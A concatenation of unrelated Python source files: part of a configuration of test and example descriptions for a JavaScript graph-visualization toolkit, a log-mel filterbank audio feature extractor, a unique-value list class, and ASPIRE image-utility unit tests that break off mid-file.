customized by the form parameters when clicking on the "remove" button.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test removing edges.',
'Description':
"""
Testing the RGraph with a simple static JSON structure and removing edges.
The edges Matt Cameron-Pearl Jam and Matt Cameron-Red Kross should be removed with
an animation when clicking in the "remove" button.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test Sum.',
'Description':
"""
Testing the RGraph with a simple static JSON structure and adding a subgraph.
Clicking on the sum button should add a subgraph as subtree of Pearl-Jam while performing
a fade-in animation.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test Morph.',
'Description':
"""
Testing the RGraph with a simple static JSON structure and morphing the structure to a graph.
Clicking on the morph button should transform the current graph into another graph, performing
fade-in-out animations.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Weighted Graph Animation',
'Description':
"""
A static JSON graph structure is used for this animation.<br /><br />
For each JSON node/edge the properties prefixed with the dollar sign ($) set the type of node/edge to be plotted, its style and its dimensions.<br /><br />
Line weights are added programmatically, <em>onBeforePlotLine</em>.<br /><br />
An <b>Elastic</b> transition is used instead of the linear transition for the animation.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Test with node styles and edge styles.',
'Description':
"""
Testing the RGraph with a simple static JSON structure.
You can choose different node styles and edge styles that should be globally applied to the vis.
Also, you can choose the random option, that sets random node and edges configuration. It overrides global configurations.
Default values are none, that means that neither nodes nor edges are drawn by default.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Graph Operations',
'Description':
"""
You can do the following operations with the RGraph<br /><br />
1.- Removing subtrees or nodes<br /><br />
2.- Removing edges<br /><br />
3.- Adding another graph, also called sum<br /><br />
4.- Morphing (or transforming) the graph into another one<br />
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Node Events',
'Description':
"""
This example shows how to add node events to the visualization.<br /><br />
This example uses native canvas text for drawing the labels.<br /><br />
<b>Drag and drop</b> nodes around.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Node Events',
'Description':
"""
Testing new Node Event system.
Triggered registered events should be logged in FFs console.
""",
'Extras': ['excanvas.js'],
'Example':False
}
],
'Hypertree': [
{
'Title': 'Tree Animation',
'Description':
"""
A static JSON Tree structure is used as input for this animation.<br /><br />
Clicking on a node should move the tree and center that node.<br /><br />
The centered node's children are displayed in a relations list in the right column.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Test with single node.',
'Description':
"""
Loads a single node JSON dataset to the Hypertree.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test removing nodes.',
'Description':
"""
Testing the Hypertree with a simple static JSON structure and removing a subtree.
The Subtree having "Matt Cameron" as root node should be removed with an animation
customized by the form parameters when clicking on the "remove" button.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test removing edges.',
'Description':
"""
Testing the Hypertree with a simple static JSON structure and removing edges.
The edges Matt Cameron-Pearl Jam and Matt Cameron-Red Kross should be removed with
an animation when clicking in the "remove" button.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Test Sum.',
'Description':
"""
Testing the Hypertree with a simple static JSON structure and adding a subgraph.
Clicking on the sum button should add a subgraph as subtree of Pearl-Jam while performing
a fade-in animation.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test Morph.',
'Description':
"""
Testing the Hypertree with a simple static JSON structure and morphing the structure to a graph.
Clicking on the morph button should transform the current graph into another graph, performing
fade-in-out animations.
The centered node's children should be displayed in a relations list.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Weighted Graph Animation',
'Description':
"""
A static JSON graph structure is used for this animation.<br /><br />
For each JSON node the "$type" and "$dim" parameters set the type of node to be plotted and its dimensions.<br /><br />
Line weights are added programmatically, <em>onBeforePlotLine</em>.<br /><br />
A <b>Back</b> transition is used instead of the linear transition for the animation.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Test with not weighted random generated tree.',
'Description':
"""
Just plotting a random not weighted Hypertree.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test with weighted random generated tree.',
'Description':
"""
Just plotting a random weighted Hypertree.
Nodes diameters must vary.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test with custom nodes and edges.',
'Description':
"""
Testing Hypertree with custom nodes and edges.
The user can select custom nodes (circle, square, etc). and
custom edges from the form.
He can also choose different animation options and easings.
This test can be improved, for example by changing the color or
overriding each node's style differently.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Graph Operations',
'Description':
"""
You can do the following operations with the Hypertree<br /><br />
1.- Removing subtrees or nodes<br /><br />
2.- Removing edges<br /><br />
3.- Adding another graph, also called sum<br /><br />
4.- Morphing (or transforming) the graph into another one<br />
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Drag Tree',
'Description':
"""
""",
'Extras': ['excanvas.js'],
},
],
'Spacetree': [
{
'Title': 'Test the Spacetree with an infinite client-side generator.',
'Description':
"""
Testing the Spacetree with a client-side generator that returns a Tree of level = 3
when the controller request method is called.<br>
This should lead to an infinite Spacetree.<br>
Also, the edges should have arrow as style.<br>
The nodes belonging in the path between the clicked node and the root node are selected with a
different color.<br>
Clicking on a node should set focus to that node.<br>
This test uses the generator.js file to create random generated trees.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test adding a subtree',
'Description':
"""
Loads a static Spacetree and should add a subtree when clicking on the add button.<br>
You can change the parameters for adding the subtree in the form.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test removing a subtree.',
'Description':
"""
Loads a static Spacetree and should remove a subtree when clicking on the remove button.<br>
You can change the parameters for removing the subtree in the form.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test unbalanced tree.',
'Description':
"""
Tests the Spacetree layout algorithm with an unbalanced tree. <br>
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test Different node sizes',
'Description':
"""
Testing a static Spacetree with rectangle nodes with different widths and heights.<br>
You can also click on a node's name in the list to add focus to that node.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Test Node types, Edge types, Animation types.',
'Description':
"""
Tests a static Spacetree with different node, edge and animation types that you can choose from
a form.
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Tree Animation',
'Description':
"""
A static JSON Tree structure is used as input for this animation.<br /><br />
<b>Click</b> on a node to select it.<br /><br />
You can <b>select the tree orientation</b> by changing the select box in the right column.<br /><br />
You can <b>change the selection mode</b> from <em>Normal</em> selection (i.e. center the selected node) to
<em>Set as Root</em>.<br /><br />
<b>Drag and Drop the canvas</b> to do some panning.<br /><br />
Leaves color depend on the number of children they actually have.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'SpaceTree with on-demand nodes',
'Description':
"""
This example shows how you can use the <b>request</b> controller method to create a SpaceTree with <b>on demand</b> nodes<br /><br />
The basic JSON Tree structure is cloned and appended on demand on each node to create an <b>infinite large SpaceTree</b><br /><br />
You can select the <b>tree orientation</b> by changing the select box in the right column.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Add/Remove Subtrees',
'Description':
"""
This example shows how to add/remove subtrees with the SpaceTree.<br /><br />
<b>Add</b> a subtree by clicking on the <em>Add</em> button located in the right column.<br /><br />
<b>Remove</b> a subtree by clicking on a red colored node
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'MultiTree',
'Description':
"""
A static JSON Tree structure is used as input for this animation.<br /><br />
By setting the specific orientation for nodes we can create a multitree structure.<br /><br />
Nodes and Edges are styled with canvas specific styles like shadows.<br /><br />
<b>Click</b> on a node to select it.<br /><br />
You can <b>change the selection mode</b> from <em>Normal</em> selection (i.e. center the selected node) to
<em>Set as Root</em>.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'loadJSON multiple times',
'Description':
"""
Testing if loading different JSON tree/graph structures affects how the SpaceTree is displayed.
""",
'Extras': ['excanvas.js', 'generators.js'],
'Example': False
},
{
'Title': 'Style Animations',
'Description':
"""
This Advanced Example shows how Node, Edge, Label and Canvas specific style animations can be triggered for this
visualization.<br /><br />
<b>Select</b> the styles to be animated in the right column and hit the <em>Morph Styles</em> button. This will
set random values for these properties and animate them.<br /><br />
Click on <em>Restore Styles</em> to set the default styles.<br /><br />
Other styles like alpha and shadows can also be triggered.<br /><br />
This example also implements a custom node rendering function for Stroke + Fill rectangles.
""",
'Extras': ['excanvas.js'],
'Example': True
}
],
'Treemap': [
{
'Title': 'Test Squarified, SliceAndDice and Strip Treemap with random Tree',
'Description':
"""
Loads a random generated weighted tree and renders it as Squarified Tree by default.<br>
""",
'Extras': ['generators.js', 'excanvas.js']
},
{
'Title': 'Animated Squarified, SliceAndDice and Strip TreeMaps',
'Description':
"""
In this example a static JSON tree is loaded into a Squarified Treemap.<br /><br />
<b>Left click</b> to set a node as root for the visualization.<br /><br />
<b>Right click</b> to set the parent node as root for the visualization.<br /><br />
You can <b>choose a different tiling algorithm</b> below:
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'TreeMap with on-demand nodes',
'Description':
"""
This example shows how you can use the <b>request</b> controller method to create a TreeMap with on demand nodes<br /><br />
This example makes use of native Canvas text and shadows, but can be easily adapted to use HTML like the other examples.<br /><br />
There should be only one level shown at a time.<br /><br />
Clicking on a band should show a new TreeMap with its most listened albums.<br /><br />
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Cushion TreeMaps',
'Description':
"""
In this example a static JSON tree is loaded into a Cushion Treemap.<br /><br />
<b>Left click</b> to set a node as root for the visualization.<br /><br />
<b>Right click</b> to set the parent node as root for the visualization.<br /><br />
You can <b>choose a different tiling algorithm</b> below:
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Sorting Problem',
'Description':
"""
Layout in Squarified TreeMaps should be unique regardless of area.
""",
'Extras': ['excanvas.js'],
},
{
'Title': 'Morphing Treemaps',
'Description':
"""
Test Morphing Treemaps
""",
'Extras': ['excanvas.js'],
},
{
'Title': 'CSS3 label animations',
'Description':
"""
Trying to use CSS3 to animate the treemap labels.
""",
'Extras': ['excanvas.js']
},
],
'Icicle': [
{
'Title': 'Icicle Tree with static JSON data',
'Description':
"""
<p>Some static JSON tree data is fed to this visualization.</p>
<p>
<b>Left click</b> to set a node as root for the visualization.
</p>
<p>
<b>Right click</b> to set the parent node as root for the visualization.
</p>
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Icicle tree with limited levels shown',
'Description':
"""
<p>A static JSON tree representing a file system tree is loaded into
an Icicle Tree.</p>
<p>
<b>Left click</b> to set a node as root for the visualization.
</p>
<p>
<b>Right click</b> to set the parent node as root for the visualization.
</p>
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Icicle with CSS3 label animations',
'Description':
"""
<p>A static JSON tree representing a file system tree is loaded into
an Icicle Tree.</p>
<p>
<b>Left click</b> to set a node as root for the visualization.
</p>
<p>
<b>Right click</b> to set the parent node as root for the visualization.
</p>
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'ForceDirected': [
{
'Title': 'Force Directed Static Graph',
'Description':
"""
A static JSON Graph structure is used as input for this visualization.<br /><br />
You can <b>zoom</b> and <b>pan</b> the visualization by <b>scrolling</b> and <b>dragging</b>.<br /><br />
You can <b>change node positions</b> by <b>dragging the nodes around</b>.<br /><br />
The clicked node's connections are displayed in a relations list in the right column.<br /><br />
The JSON static data is customized to provide different node types, colors and widths.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Weighted Graph Animation',
'Description':
"""
A static JSON graph structure is used for this animation.<br /><br />
For each JSON node/edge the properties prefixed with the dollar sign ($) set the type of node/edge to be plotted, its style and its dimensions.<br /><br />
Line weights are added programmatically, <em>onBeforePlotLine</em>.<br /><br />
An <b>Elastic</b> transition is used instead of the linear transition for the animation.
""",
'Extras': ['excanvas.js'],
'Example':False
},
{
'Title': 'Graph Operations',
'Description':
"""
You can do the following operations with a ForceDirected viz:<br /><br />
1.- Removing subtrees or nodes<br /><br />
2.- Removing edges<br /><br />
3.- Adding another graph, also called sum<br /><br />
4.- Morphing (or transforming) the graph into another one<br />
""",
'Extras': ['excanvas.js'],
'Example':False
},
{
'Title': 'Graph Operations',
'Description':
"""
In this (advanced) example a static graph is fed into the visualization.<br /><br />
Custom Animations are triggered when clicking on a node's label or when deleting a node.<br /><br />
<b>Click on a node's label</b> to select a node and its connections.<br /><br />
<b>Click on the 'x' link</b> to delete a node.<br /><br />
You can <b>drag nodes</b> around and <b>zoom</b> and <b>pan</b>, just like you did in the previous
example.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Event delegation for labels',
'Description':
"""
Testing event delegation for Extras in ForceDirected graph labels.
""",
'Extras': ['excanvas.js']
},
{
'Title': 'Force Directed Static Graph',
'Description':
"""
Infinite iterations.
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'ForceDirected3D': [
{
'Title': 'Force Directed Static Graph',
'Description':
"""
A static JSON Graph structure is used as input for this visualization.<br /><br />
You can <b>zoom</b> and <b>pan</b> the visualization by <b>scrolling</b> and <b>dragging</b>.<br /><br />
You can <b>change node positions</b> by <b>dragging the nodes around</b>.<br /><br />
The clicked node's connections are displayed in a relations list in the right column.<br /><br />
The JSON static data is customized to provide different node types, colors and widths.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Force Directed Static Graph',
'Description':
"""
A static JSON Graph structure is used as input for this visualization.<br /><br />
You can <b>zoom</b> and <b>pan</b> the visualization by <b>scrolling</b> and <b>dragging</b>.<br /><br />
You can <b>change node positions</b> by <b>dragging the nodes around</b>.<br /><br />
The clicked node's connections are displayed in a relations list in the right column.<br /><br />
The JSON static data is customized to provide different node types, colors and widths.
""",
'Extras': ['excanvas.js'],
'Example':True
},
],
'Other': [
{
'Title': 'Implementing Node Types',
'Description':
"""
In this example some custom node types are created for rendering pie charts with the RGraph.<br /><br />
Multiple instances of the RGraph are created using these node types. (top)<br /><br />
The SpaceTree is loaded with some custom data that individually changes nodes dimensions, making a bar chart (bottom).
""",
'Extras': ['excanvas.js'],
'Build': ['RGraph', 'Spacetree'],
'Example': True
},
{
'Title': 'Composing Visualizations',
'Description':
"""
In this example a RGraph is composed with another RGraph (for node rendering).<br /><br />
The RGraph used for node rendering implements a custom node type defined in the <em>"Implementing Node Types"</em> example.<br /><br />
This example shows that many visualizations can be composed to create new visualizations.
""",
'Extras': ['excanvas.js'],
'Build': ['RGraph'],
'Example': True
},
{
'Title': 'Composing Visualizations 2',
'Description':
"""
In this example a SpaceTree is composed with a RGraph (for node rendering).<br /><br />
The RGraph used for node rendering implements a custom node type defined in the <em>"Implementing Node Types"</em> example.<br /><br />
This example shows that many visualizations can be composed to create new visualizations.
""",
'Extras': ['excanvas.js'],
'Build': ['RGraph', 'Spacetree'],
'Example': True
},
{
'Title': 'SVG and Native Labels',
'Description':
"""
In this example we're using three different types of labels.<br /><br />
HTML labels are classic DOM elements.<br />
SVG labels are very similar to HTML labels (they're also DOM elements) but they can be rotated and transformed.<br />
Native labels are drawn with the Native Canvas HTML5 API.<br /><br />.
HTML labels are supported by all browsers. SVG labels are supported by all browsers except IE. Native Canvas labels are
supported by all browsers except Opera.
""",
'Extras': ['excanvas.js'],
'Build': ['RGraph', 'Hypertree'],
'Example': False
}
],
'Sunburst': [
{
'Title': 'Animation and Expand/Collapse',
'Description':
"""
A static JSON Tree structure is used as input for this animation.<br /><br />
The centered node's children are displayed in a relations list in the right column.<br /><br />
Left clicking will rotate the sunburst leaving the clicked node horizontal. The node will also change its color.<br /><br />.
Right clicking will collapse/expand nodes.
""",
'Extras': ['excanvas.js'],
'Example':False
},
{
'Title': 'Rose Diagrams',
'Description':
"""
A static JSON Tree structure is used as input for this animation that represents a rose pie chart.<br /><br />
Hovering nodes should add a tooltip and change the node's color.
""",
'Extras': ['excanvas.js'],
'Example':False
},
{
'Title': 'Connected Sunburst',
'Description':
"""
A static JSON Graph structure is used as input for this visualization.<br /><br />
This example shows how properties such as color, height, angular width and line width
can be customized per node and per edge in the JSON structure.<br /><br />
<b>Left click</b> to select a node and show its relations.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Sunburst of a Directory Tree',
'Description':
"""
A static JSON Tree structure is used as input for this visualization.<br /><br />
Tips are used to describe the file size and its last modified date.<br /><br />
<b>Left click</b> to rotate the Sunburst to the selected node and see its details.
""",
'Extras': ['excanvas.js'],
'Example':True
},
{
'Title': 'Mono node Sunburst',
'Description':
"""
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'AreaChart': [
{
'Title': 'Area Chart Example',
'Description':
"""
A static Area Chart example with gradients that displays tooltips when hovering the stacks.<br /><br />
Left-click a Stack to apply a filter to it.<br /><br />
Right-click to restore all stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Area Chart Example with click events',
'Description':
"""
A static Area Chart example with gradients that displays tooltips when hovering the stacks.<br /><br />
Left-click a Stack to apply a filter to it.<br /><br />
Right-click to restore all stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': False
}
],
'BarChart': [
{
'Title': 'Bar Chart Example',
'Description':
"""
A static vertical Bar Chart example with gradients. The Bar Chart displays tooltips when hovering the stacks. <br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Bar Chart Example',
'Description':
"""
A static horizontal Bar Chart example without gradients. The Bar Chart displays tooltips when hovering the stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Bar Chart Example with events',
'Description':
"""
A static vertical Bar Chart example with gradients. The Bar Chart displays tooltips when hovering the stacks. <br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'PieChart': [
{
'Title': 'Pie Chart Example',
'Description':
"""
A static Pie Chart example with gradients that displays tooltips when hovering the stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': True
},
{
'Title': 'Mono Valued PieChart',
'Description':
"""
More like a regular PieChart (mono valued).
""",
'Extras': ['excanvas.js'],
'Example': False
},
{
'Title': 'Pie Chart Example with events',
'Description':
"""
A static Pie Chart example with gradients that displays tooltips when hovering the stacks.<br /><br />
Click the Update button to update the JSON data.
""",
'Extras': ['excanvas.js'],
'Example': False
},
],
'TimeGraph': [
{
'Title': 'TimeGraph Example',
'Description':
"""
A static TimeGraph Example.
""",
'Extras': ['excanvas.js']
},
],
'HeatMap': [
{
'Title': 'HeatMap Example',
'Description':
"""
A static HeatMap Example.
""",
'Extras': ['excanvas.js']
},
]
}
|
# Copyright 2020 ByteDance Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy
from neurst.data.audio import FeatureExtractor, register_feature_extractor
from neurst.utils.flags_core import Flag
try:
from python_speech_features import logfbank
except ImportError:
pass
@register_feature_extractor("fbank")
class LogMelFbank(FeatureExtractor):
def __init__(self, args):
self._nfilt = args["nfilt"]
self._winlen = args["winlen"]
self._winstep = args["winstep"]
try:
from python_speech_features import logfbank
_ = logfbank
except ImportError:
raise ImportError('Please install python_speech_features with: pip3 install python_speech_features')
@staticmethod
def class_or_method_args():
return [
Flag("nfilt", dtype=Flag.TYPE.INTEGER, default=80,
help="The number of frames in the filterbank."),
Flag("winlen", dtype=Flag.TYPE.FLOAT, default=0.025,
help="The length of the analysis window in seconds. Default is 0.025s."),
Flag("winstep", dtype=Flag.TYPE.FLOAT, default=0.01,
help="The step between successive windows in seconds. Default is 0.01s.")
]
@property
def feature_dim(self):
return self._nfilt
def seconds(self, feature):
return (numpy.shape(feature)[0] - 1.) * self._winstep + self._winlen
def __call__(self, signal, rate):
inp = logfbank(signal, samplerate=rate, nfilt=self._nfilt,
winlen=self._winlen, winstep=self._winstep).astype(numpy.float32)
inp = (inp - numpy.mean(inp)) / numpy.std(inp)
return inp
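# A quick sketch on one second of synthetic 16 kHz audio; it assumes
# python_speech_features is installed and that the register decorator returns
# the class unchanged (the usual registry pattern).
if __name__ == "__main__":
    rate = 16000
    signal = numpy.random.randn(rate).astype(numpy.float32)
    extractor = LogMelFbank({"nfilt": 80, "winlen": 0.025, "winstep": 0.01})
    features = extractor(signal, rate)
    print(features.shape, extractor.feature_dim, extractor.seconds(features))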
|
try:
    from collections.abc import MutableSequence  # Python 3.3+
except ImportError:  # Python 2 fallback
    from collections import MutableSequence
class uniquelist(MutableSequence):
"""This is a list type that only adds unique values. Otherwise it behaves
entirely normally"""
def __init__(self, data=None):
super(uniquelist, self).__init__()
        if data is not None:
self._list = list(data)
else:
self._list = list()
def __len__(self):
return len(self._list)
def __getitem__(self, ii):
return self._list[ii]
def __delitem__(self, ii):
del self._list[ii]
def __setitem__(self, ii, val):
self._list[ii] = val
return self._list[ii]
def __str__(self):
return self.__repr__()
def __repr__(self):
return """<uniquelist %s>""" % self._list
def insert(self, ii, val):
self._list.insert(ii, val)
def append(self, val):
if val not in self._list:
list_idx = len(self._list)
self.insert(list_idx, val)
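# Quick usage sketch: append() silently skips values that are already present,
# while insert() and item assignment behave like a plain list.
if __name__ == '__main__':
    ul = uniquelist([1, 2, 3])
    ul.append(2)  # ignored: 2 is already in the list
    ul.append(4)  # appended
    print(ul)     # <uniquelist [1, 2, 3, 4]>
    print(len(ul), ul[0])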
|
import os.path
from unittest import TestCase
import numpy as np
from aspire.utils import (
Rotation,
crop_pad_2d,
get_aligned_rotations,
grid_2d,
grid_3d,
register_rotations,
uniform_random_angles,
)
DATA_DIR = os.path.join(os.path.dirname(__file__), "saved_test_data")
class UtilsTestCase(TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def testGrid2d(self):
# Note these reference files were created using Matlab compat grid indexing.
grid2d = grid_2d(8, indexing="xy")
self.assertTrue(
np.allclose(grid2d["x"], np.load(os.path.join(DATA_DIR, "grid2d_8_x.npy")))
)
self.assertTrue(
np.allclose(grid2d["y"], np.load(os.path.join(DATA_DIR, "grid2d_8_y.npy")))
)
self.assertTrue(
np.allclose(grid2d["r"], np.load(os.path.join(DATA_DIR, "grid2d_8_r.npy")))
)
self.assertTrue(
np.allclose(
grid2d["phi"], np.load(os.path.join(DATA_DIR, "grid2d_8_phi.npy"))
)
)
def testGrid3d(self):
# Note these reference files were created using Matlab compat grid indexing.
grid3d = grid_3d(8, indexing="xyz")
self.assertTrue(
np.allclose(grid3d["x"], np.load(os.path.join(DATA_DIR, "grid3d_8_x.npy")))
)
self.assertTrue(
np.allclose(grid3d["y"], np.load(os.path.join(DATA_DIR, "grid3d_8_y.npy")))
)
self.assertTrue(
np.allclose(grid3d["z"], np.load(os.path.join(DATA_DIR, "grid3d_8_z.npy")))
)
self.assertTrue(
np.allclose(grid3d["r"], np.load(os.path.join(DATA_DIR, "grid3d_8_r.npy")))
)
self.assertTrue(
np.allclose(
grid3d["phi"], np.load(os.path.join(DATA_DIR, "grid3d_8_phi.npy"))
)
)
self.assertTrue(
np.allclose(
grid3d["theta"], np.load(os.path.join(DATA_DIR, "grid3d_8_theta.npy"))
)
)
def testRegisterRots(self):
angles = uniform_random_angles(32, seed=0)
rots_ref = Rotation.from_euler(angles).matrices
q_ang = [[np.pi / 4, np.pi / 4, np.pi / 4]]
q_mat = Rotation.from_euler(q_ang).matrices[0]
flag = 0
regrots_ref = get_aligned_rotations(rots_ref, q_mat, flag)
q_mat_est, flag_est = register_rotations(rots_ref, regrots_ref)
self.assertTrue(np.allclose(flag_est, flag) and np.allclose(q_mat_est, q_mat))
def testSquareCrop2D(self):
# Test even/odd cases based on the convention that the center of a sequence of length n
# is (n+1)/2 if n is odd and n/2 + 1 if even.
# Cropping is done to keep the center of the sequence the same value before and after.
# Therefore the following apply:
# Cropping even to odd will result in the 0-index (beginning)
# of the sequence being chopped off (x marks the center, ~ marks deleted data):
# ---x-- => ~--x--
# Cropping odd to even will result in the -1-index (end)
# of the sequence being chopped off:
# ---x--- => ---x--~
# even to even
a = np.diag(np.arange(8))
test_a = np.diag(np.arange(1, 7))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 6)))
# even to odd
# the extra row/column cut off are the top and left
# due to the centering convention
a = np.diag(np.arange(8))
test_a = np.diag(np.arange(1, 8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 7)))
# odd to odd
a = np.diag(np.arange(9))
test_a = np.diag(np.arange(1, 8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 7)))
# odd to even
# the extra row/column cut off are the bottom and right
# due to the centering convention
a = np.diag(np.arange(9))
test_a = np.diag(np.arange(8))
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 8)))
def testSquarePad2D(self):
# Test even/odd cases based on the convention that the center of a sequence of length n
# is (n+1)/2 if n is odd and n/2 + 1 if even.
# Padding is done to keep the center of the sequence the same value before and after.
# Therefore the following apply:
# Padding from even to odd results in the spare padding being added to the -1-index (end)
# of the sequence (x represents the center, + represents padding):
# ---x-- => ---x--+
# Padding from odd to even results in the spare padding being added to the 0-index (beginning)
# of the sequence:
# --x-- => +--x--
# even to even
a = np.diag(np.arange(1, 9))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 10)))
# even to odd
# the extra padding is to the bottom and right
# due to the centering convention
a = np.diag(np.arange(1, 9))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 0, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 11)))
# odd to odd
a = np.diag(np.arange(1, 10))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 0])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 11)))
# odd to even
# the extra padding is to the top and left
# due to the centering convention
a = np.diag(np.arange(1, 10))
test_a = np.diag([0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
self.assertTrue(np.array_equal(test_a, crop_pad_2d(a, 10)))
def testRectCrop2D(self):
# Additional sanity checks for rectangular cropping case
# 12x10 -> 10x10
a = np.diag(np.arange(1, 11))
# augment to 12 rows
aug = np.vstack([a, np.zeros(10)])
aug = np.vstack([np.zeros(10), aug])
# make sure the top and bottom rows are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 10)))
# 10x12 -> 10x10
a = np.diag(np.arange(1, 11))
# augment to 12 columns
aug = np.column_stack([a, np.zeros(10)])
aug = np.column_stack([np.zeros(10), aug])
# make sure the left and right columns are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 10)))
# 9x7 -> 7x7
a = np.diag(np.arange(1, 8))
# augment to 9 rows
aug = np.vstack([a, np.zeros(7)])
aug = np.vstack([np.zeros(7), aug])
# make sure the top and bottom rows are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 7)))
# 7x9 -> 7x7
a = np.diag(np.arange(1, 8))
# augment to 9 columns
aug = np.column_stack([a, np.zeros(7)])
aug = np.column_stack([np.zeros(7), aug])
# make sure the left and right columns are stripped
self.assertTrue(np.array_equal(a, crop_pad_2d(aug, 7)))
def testRectPad2D(self):
# Additional sanity checks for rectangular padding case
# 12x10 -> 12x12
a = np.diag(np.arange(1, 11))
# augment to 12 rows
aug = np.vstack([a, np.zeros(10)])
aug = np.vstack([np.zeros(10), aug])
# expected result
padded = np.column_stack([aug, np.zeros(12)])
padded = np.column_stack([np.zeros(12), padded])
# make sure columns of fill value (0) are added to the
# left and right
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 12)))
# 10x12 -> 12x12
a = np.diag(np.arange(1, 11))
# augment to 12 columns
aug = np.column_stack([a, np.zeros(10)])
aug = np.column_stack([np.zeros(10), aug])
# expected result
padded = np.vstack([aug, np.zeros(12)])
padded = np.vstack([np.zeros(12), padded])
# make sure rows of fill value (0) are added to the
# top and bottom
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 12)))
# 9x7 -> 9x9
a = np.diag(np.arange(1, 8))
# augment to 9 rows
aug = np.vstack([a, np.zeros(7)])
aug = np.vstack([np.zeros(7), aug])
# expected result
padded = np.column_stack([aug, np.zeros(9)])
padded = np.column_stack([np.zeros(9), padded])
# make sure columns of fill value (0) are added to the
# left and right
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 9)))
# 7x9 -> 9x9
a = np.diag(np.arange(1, 8))
# augment to 9 columns
aug = np.column_stack([a, np.zeros(7)])
aug = np.column_stack([np.zeros(7), aug])
# expected result
padded = np.vstack([aug, np.zeros(9)])
padded = np.vstack([np.zeros(9), padded])
# make sure rows of fill value (0) are added to the
# top and bottom
self.assertTrue(np.array_equal(padded, crop_pad_2d(aug, 9)))
def testCropPad2DError(self):
with self.assertRaises(ValueError) as e:
_ = crop_pad_2d(np.zeros((6, 10)), 8)
        self.assertIn(
            "Cannot crop and pad an image at the same time.", str(e.exception)
        )
def testCrop2DDtype(self):
